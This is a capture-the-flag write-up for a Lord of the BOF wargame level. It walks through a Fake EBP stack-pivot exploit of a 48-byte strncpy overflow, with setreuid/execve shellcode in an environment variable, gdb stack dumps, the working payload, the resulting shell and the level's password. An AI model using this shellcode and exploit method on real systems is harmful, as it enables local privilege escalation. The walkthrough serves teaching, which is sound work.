BOF 원정대 (BOF Expedition) – Level 16 (zombie_assassin)

The source for this level is as follows.

/*
 The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy prototype; the original LOB source relies on an implicit declaration */

main(int argc, char *argv[])
{
 char buffer[40];

 if(argc < 2){
 printf("argv error\n");
 exit(0);
 }

 /* byte 47 is the high byte of RET: a stack address (0xbf...) is rejected ... */
 if(argv[1][47] == '\xbf')
 {
 printf("stack retbayed you!\n");
 exit(0);
 }

 /* ... and so is a libc address (0x40...) */
 if(argv[1][47] == '\x40')
 {
 printf("library retbayed you, too!!\n");
 exit(0);
 }

 // strncpy instead of strcpy!
 // 48 bytes = buffer[40] + saved EBP (4) + RET (4): exactly enough to overwrite both
 strncpy(buffer, argv[1], 48); 
 printf("%s\n", buffer);
}

The comment in the source says FEBP, which here stands for Fake EBP.
A Fake EBP attack overwrites the saved EBP with a forged value and puts the address of a `leave` instruction (the `leave; ret` at the end of main) into RET. When main returns, EBP already holds the forged value; the second `leave` then does `mov %esp, %ebp; pop %ebp`, so ESP becomes fake EBP + 4, and the following `ret` pops its return address from there. The jump target is therefore whatever 4-byte word sits at fake EBP + 4, which lets us return to a location of our choosing without putting a stack or libc address at byte 47 (the byte the program checks).

Here we first register NOP + SHELLCODE in an environment variable, fill the buffer with copies of that variable's address, and forge EBP so that it points at a stack location holding those copies (so that the word at fake EBP + 4 is the sled address). First, let's find the addresses the attack needs.

[assassin@localhost assassin]$ export SH=`python -c "print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'"` 
[assassin@localhost assassin]$ gdb zombie_assassin_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave 
0x80484e0 <main+160>: ret 
0x80484e1 <main+161>: nop 
0x80484e2 <main+162>: nop 
0x80484e3 <main+163>: nop 
0x80484e4 <main+164>: nop 
0x80484e5 <main+165>: nop 
0x80484e6 <main+166>: nop 
0x80484e7 <main+167>: nop 
0x80484e8 <main+168>: nop 
0x80484e9 <main+169>: nop 
0x80484ea <main+170>: nop 
0x80484eb <main+171>: nop 
0x80484ec <main+172>: nop 
0x80484ed <main+173>: nop 
0x80484ee <main+174>: nop 
0x80484ef <main+175>: nop 
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048446
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/assassin/zombie_assassin_tmp AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x8048446 in main ()
(gdb) x/32wx $esp
0xbffffa20: 0xbffffa48 0x4000a970 0x400f855b 0x080495a4
0xbffffa30: 0x4000ae60 0xbffffa94 0xbffffa48 0x0804842b
0xbffffa40: 0x08049590 0x080495a4 0xbffffa68 0x400309cb
0xbffffa50: 0x00000002 0xbffffa94 0xbffffaa0 0x40013868
0xbffffa60: 0x00000002 0x08048390 0x00000000 0x080483b1
0xbffffa70: 0x08048440 0x00000002 0xbffffa94 0x080482e4
0xbffffa80: 0x0804851c 0x4000ae60 0xbffffa8c 0x40013e90
0xbffffa90: 0x00000002 0xbffffb8a 0xbffffbad 0x00000000
(gdb) 
0xbffffaa0: 0xbffffbcb 0xbffffbde 0xbffffbf5 0xbffffc14
0xbffffab0: 0xbffffc36 0xbffffc44 0xbffffe07 0xbffffe26
0xbffffac0: 0xbffffe44 0xbffffe59 0xbffffe79 0xbffffe84
0xbffffad0: 0xbfffff15 0xbfffff26 0xbfffff2e 0xbfffff3f
0xbffffae0: 0xbfffff49 0xbfffff57 0xbfffff68 0xbfffff76
0xbffffaf0: 0xbfffff81 0xbfffff95 0x00000000 0x00000003
0xbffffb00: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb10: 0x00000006 0x00000006 0x00001000 0x00000007
(gdb) 
0xbffffb20: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb30: 0x08048390 0x0000000b 0x00000203 0x0000000c
0xbffffb40: 0x00000203 0x0000000d 0x00000203 0x0000000e
0xbffffb50: 0x00000203 0x00000010 0x0febfbff 0x0000000f
0xbffffb60: 0xbffffb85 0x00000000 0x00000000 0x00000000
0xbffffb70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb80: 0x00000000 0x38366900 0x682f0036 0x2f656d6f
0xbffffb90: 0x61737361 0x6e697373 0x6d6f7a2f 0x5f656962
(gdb) 
0xbffffba0: 0x61737361 0x6e697373 0x706d745f 0x41414100
0xbffffbb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbc0: 0x41414141 0x41414141 0x50004141 0x2f3d4457
0xbffffbd0: 0x656d6f68 0x7373612f 0x69737361 0x4552006e
0xbffffbe0: 0x45544f4d 0x54534f48 0x3239313d 0x3836312e
0xbffffbf0: 0x312e332e 0x534f4800 0x4d414e54 0x6f6c3d45
0xbffffc00: 0x686c6163 0x2e74736f 0x61636f6c 0x6d6f646c
0xbffffc10: 0x006e6961 0x5353454c 0x4e45504f 0x752f7c3d
(gdb) 
0xbffffc20: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069
0xbffffc30: 0x25206873 0x53550073 0x613d5245 0x73617373
0xbffffc40: 0x006e6973 0x435f534c 0x524f4c4f 0x6f6e3d53
0xbffffc50: 0x3a30303d 0x303d6966 0x69643a30 0x3b31303d
0xbffffc60: 0x6c3a3433 0x31303d6e 0x3a36333b 0x343d6970
0xbffffc70: 0x33333b30 0x3d6f733a 0x333b3130 0x64623a35
0xbffffc80: 0x3b30343d 0x303b3333 0x64633a31 0x3b30343d
0xbffffc90: 0x303b3333 0x726f3a31 0x3b31303d 0x333b3530
(gdb) 
0xbffffca0: 0x31343b37 0x3d696d3a 0x303b3130 0x37333b35
0xbffffcb0: 0x3a31343b 0x303d7865 0x32333b31 0x632e2a3a
0xbffffcc0: 0x303d646d 0x32333b31 0x652e2a3a 0x303d6578
0xbffffcd0: 0x32333b31 0x632e2a3a 0x303d6d6f 0x32333b31
0xbffffce0: 0x622e2a3a 0x303d6d74 0x32333b31 0x622e2a3a
0xbffffcf0: 0x303d7461 0x32333b31 0x732e2a3a 0x31303d68
0xbffffd00: 0x3a32333b 0x73632e2a 0x31303d68 0x3a32333b
0xbffffd10: 0x61742e2a 0x31303d72 0x3a31333b 0x67742e2a
(gdb) 
0xbffffd20: 0x31303d7a 0x3a31333b 0x72612e2a 0x31303d6a
0xbffffd30: 0x3a31333b 0x61742e2a 0x31303d7a 0x3a31333b
0xbffffd40: 0x7a6c2e2a 0x31303d68 0x3a31333b 0x697a2e2a
0xbffffd50: 0x31303d70 0x3a31333b 0x3d7a2e2a 0x333b3130
0xbffffd60: 0x2e2a3a31 0x31303d5a 0x3a31333b 0x7a672e2a
0xbffffd70: 0x3b31303d 0x2a3a3133 0x327a622e 0x3b31303d
0xbffffd80: 0x2a3a3133 0x3d7a622e 0x333b3130 0x2e2a3a31
0xbffffd90: 0x303d7a74 0x31333b31 0x722e2a3a 0x303d6d70
(gdb) 
0xbffffda0: 0x31333b31 0x632e2a3a 0x3d6f6970 0x333b3130
0xbffffdb0: 0x2e2a3a31 0x3d67706a 0x333b3130 0x2e2a3a35
0xbffffdc0: 0x3d666967 0x333b3130 0x2e2a3a35 0x3d706d62
0xbffffdd0: 0x333b3130 0x2e2a3a35 0x3d6d6278 0x333b3130
0xbffffde0: 0x2e2a3a35 0x3d6d7078 0x333b3130 0x2e2a3a35
0xbffffdf0: 0x3d676e70 0x333b3130 0x2e2a3a35 0x3d666974
0xbffffe00: 0x333b3130 0x4d003a35 0x54484341 0x3d455059
0xbffffe10: 0x36383369 0x6465722d 0x2d746168 0x756e696c
(gdb) 
0xbffffe20: 0x6e672d78 0x414d0075 0x2f3d4c49 0x2f726176
0xbffffe30: 0x6f6f7073 0x616d2f6c 0x612f6c69 0x73617373
0xbffffe40: 0x006e6973 0x55504e49 0x3d435254 0x6374652f
0xbffffe50: 0x706e692f 0x63727475 0x53414200 0x4e455f48
0xbffffe60: 0x682f3d56 0x2f656d6f 0x61737361 0x6e697373
0xbffffe70: 0x61622e2f 0x63726873 0x4e414c00 0x6e653d47
0xbffffe80: 0x0053555f 0x903d4853 0x90909090 0x90909090
0xbffffe90: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffffea0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffeb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffec0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffed0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffee0: 0x90909090 0x90909090 0x31909090 0xcd31b0c0
0xbffffef0: 0x89c38980 0xb0c031c1 0x3180cd46 0x2f6850c0
0xbfffff00: 0x6868732f 0x6e69622f 0x5350e389 0xd231e189
0xbfffff10: 0x80cd0bb0 0x474f4c00 0x454d414e 0x7373613d
(gdb) q
The program is running. Exit anyway? (y or n) y
[assassin@localhost assassin]$ 

1) address of the `leave` instruction (main+159): 0x80484df
2) address of the argv[1] string on the stack: 0xbffffbad. In the dump, argv[1] is the third word at 0xbffffa90 and the 'A's start right after the NUL that ends argv[0] ("..._tmp\0AAA" at 0xbffffbac). This is the copy of our payload that the kernel placed on the stack, and it is the location the forged EBP will point at. (main's own `buffer` is at ebp-0x28 = 0xbffffa20 in this run, with the saved EBP at 0xbffffa48 and RET at 0xbffffa4c, which is why exactly 48 bytes are copied.)
3) address inside the NOP + SHELLCODE environment variable: 0xbffffe90. "SH=" is visible at 0xbffffe84 and the NOP sled runs from 0xbffffe87 up to the shellcode at 0xbffffeeb, so 0xbffffe90 lands well inside the sled.

Now that we have all the addresses, let's attack. The PAYLOAD is as follows.

[address inside the NOP + SHELLCODE environment variable, 0xbffffe90, repeated 10 times] [fake EBP = address of the argv[1] string, 0xbffffbad] [address of `leave`, 0x80484df]

Byte 47 is 0x08 (the high byte of 0x80484df), so both checks pass. After main's `leave; ret`, EBP holds the fake value and EIP is `leave` again; that `leave; ret` sets ESP to fake EBP + 4 and pops the return address from there. Because argv[1] holds the same 48 bytes as `buffer`, the read lands in the run of ten 0xbffffe90 words as long as fake EBP + 4 is 4-byte aligned with them. The exact address of argv[1] differs between gdb and the real run (different program name and argument length), so the fake EBP is adjusted one byte at a time until the read is aligned with a word of the sled address; a misaligned read yields a garbage address and a segmentation fault.

[assassin@localhost assassin]$ ./zombie_assassin `python -c "print '\x90\xfe\xff\xbf'*10 + '\xad\xfb\xff\xbf' + '\xdf\x84\x04\x08'"`
?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `python -c "print '\x90\xfe\xff\xbf'*10 + '\xae\xfb\xff\xbf' + '\xdf\x84\x04\x08'"` 
?
Segmentation fault
[assassin@localhost assassin]$ ./zombie_assassin `python -c "print '\x90\xfe\xff\xbf'*10 + '\xaf\xfb\xff\xbf' + '\xdf\x84\x04\x08'"` 
?
bash$ id
uid=516(zombie_assassin) gid=515(assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$ 
